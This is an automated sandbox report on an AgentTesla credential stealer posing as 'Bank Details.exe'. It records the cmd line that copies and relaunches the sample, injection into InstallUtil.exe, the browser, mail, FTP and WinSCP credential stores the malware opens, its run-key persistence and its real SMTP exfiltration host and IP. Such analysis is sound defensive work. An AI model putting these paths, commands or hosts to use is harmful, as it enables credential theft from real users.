                      Source: C:\Users\user\Desktop\udo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 804008Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\user\Desktop\Bank Details.exe" "C:\Users\user\Desktop\udo.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Users\user\Desktop\udo.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 41Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\udo.exe "C:\Users\user\Desktop\udo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\udo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Users\user\Desktop\Bank Details.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeQueries volume information: C:\Users\user\Desktop\udo.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\udo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeQueries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Bank Details.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bank Details.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: udo.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4120, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bank Details.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: udo.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4120, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.InstallUtil.exe.730000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.44b8b92.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.45f6f20.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43dcee2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.468bd72.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.47020c0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.43a1d22.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.udo.exe.4366b52.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.447d9d2.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.45da998.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Bank Details.exe.4442802.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.3823957553.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Bank Details.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: udo.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4120, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt21
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		211
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                      Process Injection                      		1
                      Software Packing                      		NTDS1
                      Process Discovery                      		Distributed Component Object Model1
                      Input Capture                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		LSA Secrets141
                      Virtualization/Sandbox Evasion                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Valid Accounts                      		DCSync1
                      Remote System Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Hidden Files and Directories                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501091 Sample: Bank Details.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 50 mail.azmaplast.com 2->50 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 8 other signatures 2->66 9 Bank Details.exe 5 2->9         started        13 boqXv.exe 4 2->13         started        15 boqXv.exe 3 2->15         started        signatures3 process4 file5 48 C:\Users\user\...\Bank Details.exe.log, ASCII 9->48 dropped 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->86 17 cmd.exe 3 9->17         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        signatures6 process7 file8 42 C:\Users\user\Desktop\udo.exe, PE32 17->42 dropped 44 C:\Users\user\...\udo.exe:Zone.Identifier, ASCII 17->44 dropped 56 Uses ping.exe to sleep 17->56 58 Uses ping.exe to check the status of other devices and networks 17->58 25 udo.exe 2 17->25         started        28 PING.EXE 1 17->28         started        31 conhost.exe 17->31         started        33 PING.EXE 1 17->33         started        signatures9 process10 dnsIp11 78 Multi AV Scanner detection for dropped file 25->78 80 Machine Learning detection for dropped file 25->80 82 Writes to foreign memory regions 25->82 84 3 other signatures 25->84 35 InstallUtil.exe 1 4 25->35         started        40 InstallUtil.exe 25->40         started        54 127.0.0.1 unknown unknown 28->54 signatures12 process13 dnsIp14 52 mail.azmaplast.com 193.141.65.39, 49722, 587 KPNNL Iran (ISLAMIC Republic Of) 35->52 46 C:\Users\user\AppData\Roaming\...\boqXv.exe, PE32 35->46 dropped 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->68 70 Tries to steal Mail credentials (via file / registry access) 35->70 72 Tries to harvest and steal ftp login credentials 35->72 76 2 other signatures 35->76 74 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 40->74 file15 signatures16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Bank Details.exe55%ReversingLabsWin32.Spyware.Negasteal
                      Bank Details.exe43%VirustotalBrowse
                      Bank Details.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\udo.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\boqXv\boqXv.exe0%VirustotalBrowse
                      C:\Users\user\Desktop\udo.exe55%ReversingLabsWin32.Spyware.Negasteal
                      C:\Users\user\Desktop\udo.exe43%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.azmaplast.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://mail.azmaplast.com0%Avira URL Cloudsafe
                      http://mail.azmaplast.com0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.azmaplast.com
                      		193.141.65.39
                      		truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.azmaplast.comInstallUtil.exe, 00000012.00000002.3823957553.0000000002B3A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://account.dyn.com/Bank Details.exe, 00000000.00000002.1713067974.0000000004407000.00000004.00000800.00020000.00000000.sdmp, Bank Details.exe, 00000000.00000002.1713067974.0000000004702000.00000004.00000800.00020000.00000000.sdmp, Bank Details.exe, 00000000.00000002.1713067974.0000000004529000.00000004.00000800.00020000.00000000.sdmp, udo.exe, 00000010.00000002.3840250798.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, udo.exe, 00000010.00000002.3840250798.00000000045BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.2877661003.0000000000732000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      193.141.65.39
                      		mail.azmaplast.comIran (ISLAMIC Republic Of)
                      		286KPNNLtrue

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1501091
                      Start date and time:2024-08-29 12:15:01 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:Bank Details.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@18/10@1/2
                      EGA Information:
                      • Successful, ratio: 60%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 215
                      • Number of non-executed functions: 11
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target boqXv.exe, PID 6208 because it is empty
                      • Execution Graph export aborted for target boqXv.exe, PID 6940 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      06:16:00API Interceptor208x Sleep call for process: Bank Details.exe modified
                      06:17:04API Interceptor16x Sleep call for process: PING.EXE modified
                      06:17:54API Interceptor1944290x Sleep call for process: udo.exe modified
                      06:19:01API Interceptor118x Sleep call for process: InstallUtil.exe modified
                      11:16:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\udo.lnk
                      11:19:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                      11:19:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

                      Joe Sandbox View / Context

                      IPs

